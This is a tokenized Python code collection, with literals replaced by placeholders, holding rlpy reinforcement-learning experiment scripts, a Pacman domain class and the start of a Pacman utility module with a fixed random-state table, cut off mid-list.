baseline_cls ( env_spec = env . spec ) <EOL> algo = VPG ( <EOL> env = env , policy = policy , baseline = baseline , <EOL> n_itr = <NUM_LIT:1> , batch_size = <NUM_LIT:1000> , max_path_length = <NUM_LIT:100> <EOL> ) <EOL> algo . train ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from rlpy . Domains import InfCartPoleBalance <EOL> from rlpy . Agents import Greedy_GQ , SARSA , Q_Learning <EOL> from rlpy . Representations import * <EOL> from rlpy . Policies import eGreedy <EOL> from rlpy . Experiments import Experiment <EOL> import numpy as np <EOL> from hyperopt import hp <EOL> param_space = { '<STR_LIT>' : hp . quniform ( "<STR_LIT>" , <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : <EOL> hp . loguniform ( <EOL> "<STR_LIT>" , <EOL> np . log ( <NUM_LIT> ) , <EOL> np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT:1> ) ) } <EOL> def make_experiment ( <EOL> exp_id = <NUM_LIT:1> , path = "<STR_LIT>" , <EOL> discover_threshold = <NUM_LIT> , <EOL> lambda_ = <NUM_LIT:0.> , <EOL> boyan_N0 = <NUM_LIT> , <EOL> initial_learn_rate = <NUM_LIT> , <EOL> discretization = <NUM_LIT> ) : <EOL> opt = { } <EOL> opt [ "<STR_LIT:path>" ] = path <EOL> opt [ "<STR_LIT>" ] = exp_id <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:20> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:10> <EOL> sparsify = True <EOL> kappa = <NUM_LIT> <EOL> domain = InfCartPoleBalance ( ) <EOL> opt [ "<STR_LIT>" ] = domain <EOL> initial_rep = IndependentDiscretization ( <EOL> domain , <EOL> discretization = discretization ) <EOL> representation = iFDD ( domain , discover_threshold , initial_rep , <EOL> sparsify = sparsify , <EOL> discretization = discretization , <EOL> useCache = True , <EOL> iFDDPlus = <NUM_LIT:1> - kappa ) <EOL> policy = eGreedy ( representation , epsilon = <NUM_LIT:0.1> ) <EOL> opt [ "<STR_LIT>" ] = SARSA ( policy , representation , <EOL> lambda_ = lambda_ , <EOL> discount_factor = domain . discount_factor , <EOL> initial_learn_rate = initial_learn_rate , <EOL> learn_rate_decay_mode = "<STR_LIT>" , boyan_N0 = boyan_N0 ) <EOL> experiment = Experiment ( ** opt ) <EOL> return experiment <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> experiment = make_experiment ( <NUM_LIT:1> ) <EOL> experiment . run ( ) <EOL> experiment . save ( ) </s>
<s> """<STR_LIT>""" <EOL> from rlpy . Domains . IntruderMonitoring import IntruderMonitoring <EOL> from rlpy . Agents import SARSA <EOL> from rlpy . Representations import iFDD , IndependentDiscretization <EOL> from rlpy . Policies import eGreedy <EOL> from rlpy . Experiments import Experiment <EOL> import numpy as np <EOL> from hyperopt import hp <EOL> param_space = { '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , <EOL> np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT:1> ) ) } <EOL> def make_experiment ( <EOL> exp_id = <NUM_LIT:1> , path = "<STR_LIT>" , <EOL> discover_threshold = <NUM_LIT:1.0> , <EOL> lambda_ = <NUM_LIT:0.> , <EOL> boyan_N0 = <NUM_LIT> , <EOL> initial_learn_rate = <NUM_LIT> ) : <EOL> opt = { } <EOL> opt [ "<STR_LIT:path>" ] = path <EOL> opt [ "<STR_LIT>" ] = exp_id <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:10> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> sparsify = <NUM_LIT:1> <EOL> ifddeps = <NUM_LIT> <EOL> domain = IntruderMonitoring ( ) <EOL> opt [ "<STR_LIT>" ] = domain <EOL> initial_rep = IndependentDiscretization ( domain ) <EOL> representation = iFDD ( domain , discover_threshold , initial_rep , <EOL> sparsify = sparsify , <EOL> useCache = True , <EOL> iFDDPlus = <NUM_LIT:1> - ifddeps ) <EOL> policy = eGreedy ( representation , epsilon = <NUM_LIT:0.1> ) <EOL> opt [ "<STR_LIT>" ] = SARSA ( <EOL> policy , representation , discount_factor = domain . discount_factor , <EOL> lambda_ = lambda_ , initial_learn_rate = initial_learn_rate , <EOL> learn_rate_decay_mode = "<STR_LIT>" , boyan_N0 = boyan_N0 ) <EOL> experiment = Experiment ( ** opt ) <EOL> return experiment <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from rlpy . Tools . run import run_profiled <EOL> experiment = make_experiment ( <NUM_LIT:1> ) <EOL> experiment . run ( visualize_steps = False , visualize_performance = <NUM_LIT:10> , <EOL> visualize_learning = True ) </s>
<s> from rlpy . Domains import PST <EOL> from rlpy . Agents import Q_Learning <EOL> from rlpy . Representations import * <EOL> from rlpy . Policies import eGreedy <EOL> from rlpy . Experiments import Experiment <EOL> import numpy as np <EOL> from hyperopt import hp <EOL> param_space = { <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , <EOL> np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT> ) ) , <EOL> '<STR_LIT>' : hp . loguniform ( "<STR_LIT>" , np . log ( <NUM_LIT> ) , np . log ( <NUM_LIT:1> ) ) } <EOL> def make_experiment ( <EOL> exp_id = <NUM_LIT:1> , path = "<STR_LIT>" , <EOL> discover_threshold = <NUM_LIT> , <EOL> lambda_ = <NUM_LIT:0.> , <EOL> boyan_N0 = <NUM_LIT> , <EOL> initial_learn_rate = <NUM_LIT> ) : <EOL> opt = { } <EOL> opt [ "<STR_LIT:path>" ] = path <EOL> opt [ "<STR_LIT>" ] = exp_id <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:30> <EOL> opt [ "<STR_LIT>" ] = <NUM_LIT:10> <EOL> sparsify = <NUM_LIT:1> <EOL> kappa = <NUM_LIT> <EOL> domain = PST ( NUM_UAV = <NUM_LIT:4> ) <EOL> opt [ "<STR_LIT>" ] = domain <EOL> initial_rep = IndependentDiscretization ( domain ) <EOL> representation = iFDD ( domain , discover_threshold , initial_rep , <EOL> sparsify = sparsify , <EOL> useCache = True , <EOL> iFDDPlus = <NUM_LIT:1> - kappa ) <EOL> policy = eGreedy ( representation , epsilon = <NUM_LIT:0.1> ) <EOL> opt [ "<STR_LIT>" ] = Q_Learning ( policy , representation , <EOL> discount_factor = domain . discount_factor , <EOL> lambda_ = lambda_ , initial_learn_rate = initial_learn_rate , <EOL> learn_rate_decay_mode = "<STR_LIT>" , boyan_N0 = boyan_N0 ) <EOL> experiment = Experiment ( ** opt ) <EOL> return experiment <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from rlpy . Tools . run import run_profiled <EOL> run_profiled ( make_experiment ) </s>
<s> """<STR_LIT>""" <EOL> from rlpy . Tools import __rlpy_location__ <EOL> from . Domain import Domain <EOL> from . PacmanPackage import layout , pacman , game , ghostAgents <EOL> from . PacmanPackage import graphicsDisplay <EOL> import numpy as np <EOL> from copy import deepcopy <EOL> import os <EOL> import time <EOL> __copyright__ = "<STR_LIT>" <EOL> __credits__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> __license__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> class Pacman ( Domain ) : <EOL> """<STR_LIT>""" <EOL> _max_scared_time = <NUM_LIT> <EOL> actions = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> actions_num = <NUM_LIT:5> <EOL> episodeCap = <NUM_LIT:1000> <EOL> default_layout_dir = os . path . join ( <EOL> __rlpy_location__ , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , noise = <NUM_LIT> , timeout = <NUM_LIT:30> , <EOL> layoutFile = os . path . join ( <EOL> default_layout_dir , '<STR_LIT>' ) , <EOL> numGhostAgents = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> self . noise = noise <EOL> self . layoutFile = layoutFile <EOL> layout_file_content = self . _tryToLoad ( self . layoutFile ) <EOL> self . layout = layout . Layout ( layout_file_content ) <EOL> self . numGhostAgents = numGhostAgents <EOL> self . game_state = pacman . GameState ( ) <EOL> self . game_rules = pacman . ClassicGameRules ( timeout ) <EOL> self . layout_copy = deepcopy ( self . layout ) <EOL> self . game_state . data . initialize ( self . layout_copy , self . numGhostAgents ) <EOL> self . num_total_food = len ( self . layout_copy . food . asList ( ) ) <EOL> self . num_total_capsules = len ( self . layout_copy . capsules ) <EOL> self . _defaultSettings ( ) <EOL> self . restartGraphics = None <EOL> self . timerswitch = False <EOL> self . savedtimer = None <EOL> self . gameDisplay = None <EOL> self . _set_statespace_limits ( ) <EOL> super ( Pacman , self ) . __init__ ( ) <EOL> def _set_statespace_limits ( self ) : <EOL> statespace_limits = [ ] <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . width - <NUM_LIT:2> ] ) <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . height - <NUM_LIT:2> ] ) <EOL> for ghost in self . game_state . data . agentStates [ <NUM_LIT:1> : ] : <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . width - <NUM_LIT:2> ] ) <EOL> statespace_limits . append ( [ <NUM_LIT:1> , self . layout . height - <NUM_LIT:2> ] ) <EOL> statespace_limits . append ( [ <NUM_LIT:0> , self . _max_scared_time ] ) <EOL> statespace_limits += [ [ <NUM_LIT:0> , <NUM_LIT:1> ] ] * ( <EOL> self . num_total_food + self . num_total_capsules ) <EOL> self . statespace_limits = np . array ( statespace_limits , dtype = "<STR_LIT:float>" ) <EOL> def _set_state ( self , s ) : <EOL> """<STR_LIT>""" <EOL> data = self . game_state . data <EOL> agent_states = data . agentStates <EOL> agent_states . configuration . pos = ( s [ <NUM_LIT:0> ] , s [ <NUM_LIT:1> ] ) <EOL> num_ghosts = len ( agent_states ) - <NUM_LIT:1> <EOL> for i in range ( <NUM_LIT:1> , num_ghosts + <NUM_LIT:1> ) : <EOL> part_s = s [ ( <NUM_LIT:3> * i ) - <NUM_LIT:1> : <NUM_LIT:3> * i ] <EOL> agent_states [ i ] . configuration . pos = ( part_s [ <NUM_LIT:0> ] , part_s [ <NUM_LIT:1> ] ) <EOL> agent_states [ i ] . scaredTimer = part_s [ <NUM_LIT:2> ] <EOL> s_food = s [ ( num_ghosts + <NUM_LIT:1> ) * <NUM_LIT:3> : ] <EOL> x = <NUM_LIT:0> <EOL> y = <NUM_LIT:0> <EOL> i = <NUM_LIT:0> <EOL> data . capsules = [ ] <EOL> for char in str ( self . layout_copy ) : <EOL> if char == "<STR_LIT:.>" : <EOL> data . food [ x ] [ y ] = bool ( s_food [ i ] ) <EOL> i += <NUM_LIT:1> <EOL> elif char == "<STR_LIT:o>" : <EOL> coord = ( x , self . layout_copy . height - y ) <EOL> if s_food [ i ] : <EOL> data . capsules . append ( coord ) <EOL> i += <NUM_LIT:1> <EOL> elif char == "<STR_LIT:\n>" : <EOL> y += <NUM_LIT:1> <EOL> x = - <NUM_LIT:1> <EOL> x += <NUM_LIT:1> <EOL> def _get_state ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . game_state . data <EOL> agent_states = self . game_state . data . agentStates <EOL> num_ghosts = len ( agent_states ) - <NUM_LIT:1> <EOL> s = np . zeros ( <EOL> <NUM_LIT:2> + num_ghosts * <NUM_LIT:3> + self . num_total_food + self . num_total_capsules ) <EOL> s [ : <NUM_LIT:2> ] = agent_states [ <NUM_LIT:0> ] . configuration . pos <EOL> for i in range ( num_ghosts ) : <EOL> s [ <NUM_LIT:2> + i * <NUM_LIT:3> : <NUM_LIT:2> + i * <NUM_LIT:3> + <NUM_LIT:2> ] = agent_states [ i + <NUM_LIT:1> ] . configuration . pos <EOL> s [ <NUM_LIT:2> + i * <NUM_LIT:3> + <NUM_LIT:2> ] = agent_states [ i + <NUM_LIT:1> ] . scaredTimer <EOL> i = <NUM_LIT:2> + num_ghosts * <NUM_LIT:3> <EOL> x = <NUM_LIT:0> <EOL> y = <NUM_LIT:0> <EOL> for char in str ( self . layout_copy ) : <EOL> if char == "<STR_LIT:.>" : <EOL> s [ i ] = data . food [ x ] [ y ] <EOL> i += <NUM_LIT:1> <EOL> elif char == "<STR_LIT:\n>" : <EOL> y += <NUM_LIT:1> <EOL> x = - <NUM_LIT:1> <EOL> elif char == "<STR_LIT:o>" : <EOL> coord = ( x , self . layout_copy . height - y ) <EOL> if coord in data . capsules : <EOL> s [ i ] = <NUM_LIT:1.> <EOL> i += <NUM_LIT:1> <EOL> x += <NUM_LIT:1> <EOL> return s <EOL> state = property ( _get_state , _set_state ) <EOL> def showDomain ( self , a , s = None ) : <EOL> if s is not None : <EOL> errStr = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> raise Exception ( errStr ) <EOL> s = self . game_state <EOL> if self . gameDisplay is None : <EOL> self . gameDisplay = graphicsDisplay . PacmanGraphics ( ) <EOL> self . gameDisplay . startGraphics ( self ) <EOL> self . gameDisplay . drawStaticObjects ( s . data ) <EOL> self . gameDisplay . drawAgentObjects ( s . data ) <EOL> elif self . _cleanup_graphics : <EOL> self . _cleanup_graphics = False <EOL> self . gameDisplay . removeAllFood ( ) <EOL> self . gameDisplay . removeAllCapsules ( ) <EOL> self . gameDisplay . food = self . gameDisplay . drawFood ( <EOL> self . gameDisplay . layout . food ) <EOL> self . gameDisplay . capsules = self . gameDisplay . drawCapsules ( <EOL> self . gameDisplay . layout . capsules ) <EOL> s . data . layout . food = s . data . food <EOL> for agent in range ( len ( s . data . agentStates ) ) : <EOL> s . data . _agentMoved = agent <EOL> self . gameDisplay . update ( s . data ) <EOL> s . _foodEaten = None <EOL> s . _capsuleEaten = None <EOL> def step ( self , a ) : <EOL> """<STR_LIT>""" <EOL> if self . random_state . random_sample ( ) < self . noise : <EOL> a = self . random_state . choice ( self . possibleActions ( ) ) <EOL> a = self . actions [ a ] <EOL> next_state_p = self . game_state . generateSuccessor ( <NUM_LIT:0> , a ) <EOL> next_state = next_state_p <EOL> for i in range ( <NUM_LIT:1> , len ( self . game_state . data . agentStates ) ) : <EOL> if next_state . isWin ( ) or next_state . isLose ( ) : <EOL> break <EOL> ghostOptions = pacman . GhostRules . getLegalActions ( next_state , i ) <EOL> randomAction_ind = self . random_state . randint ( len ( ghostOptions ) ) <EOL> randomAction = ghostOptions [ randomAction_ind ] <EOL> next_state = next_state . generateSuccessor ( i , randomAction ) <EOL> next_state . data . _foodEaten = next_state_p . data . _foodEaten <EOL> next_state . data . _capsuleEaten = next_state_p . data . _capsuleEaten <EOL> r = next_state . data . score - self . game_state . data . score <EOL> self . game_state = next_state <EOL> terminal = self . isTerminal ( ) <EOL> return r , self . _get_state ( ) , terminal , self . possibleActions ( ) <EOL> def s0 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . game_state = pacman . GameState ( ) <EOL> self . game_rules = pacman . ClassicGameRules ( timeout = <NUM_LIT:30> ) <EOL> self . layout_copy = deepcopy ( self . layout ) <EOL> self . game = self . game_rules . newGame ( <EOL> self . layout_copy , pacman , self . ghosts , DummyGraphics ( ) , self . beQuiet , catchExceptions = False ) <EOL> self . game_state . data . initialize ( self . layout_copy , self . numGhostAgents ) <EOL> self . _cleanup_graphics = True <EOL> return self . state , self . isTerminal ( ) , self . possibleActions ( ) <EOL> def possibleActions ( self ) : <EOL> if self . isTerminal ( ) : <EOL> return np . array ( [ <NUM_LIT:0> ] ) <EOL> possibleActions = [ ] <EOL> possibleMoves = pacman . GameState . getLegalActions ( <EOL> self . game_state , agentIndex = <NUM_LIT:0> ) <EOL> for a in possibleMoves : <EOL> possibleActions . append ( self . actions . index ( a ) ) <EOL> return np . array ( possibleActions ) <EOL> def isTerminal ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . game_state . data . _lose or self . game_state . data . _win <EOL> def _defaultSettings ( self ) : <EOL> self . ghostNum = <NUM_LIT:2> <EOL> self . ghosts = [ ghostAgents . RandomGhost ( <EOL> game . Agent ) for i in range ( self . ghostNum ) ] <EOL> self . beQuiet = False <EOL> def _tryToLoad ( self , fullname ) : <EOL> f = open ( fullname ) <EOL> grid = [ line . strip ( ) for line in f ] <EOL> f . close ( ) <EOL> return grid <EOL> class DummyGraphics ( object ) : <EOL> def initialize ( self , * arg , ** kwargs ) : <EOL> pass <EOL> def update ( self , * arg , ** kwargs ) : <EOL> pass <EOL> def finalize ( self , * arg , ** kwargs ) : <EOL> pass </s>
<s> import sys <EOL> import inspect <EOL> import heapq <EOL> import random <EOL> import cStringIO <EOL> class FixedRandom : <EOL> def __init__ ( self ) : <EOL> fixedState = ( <EOL> <NUM_LIT:3> , ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , 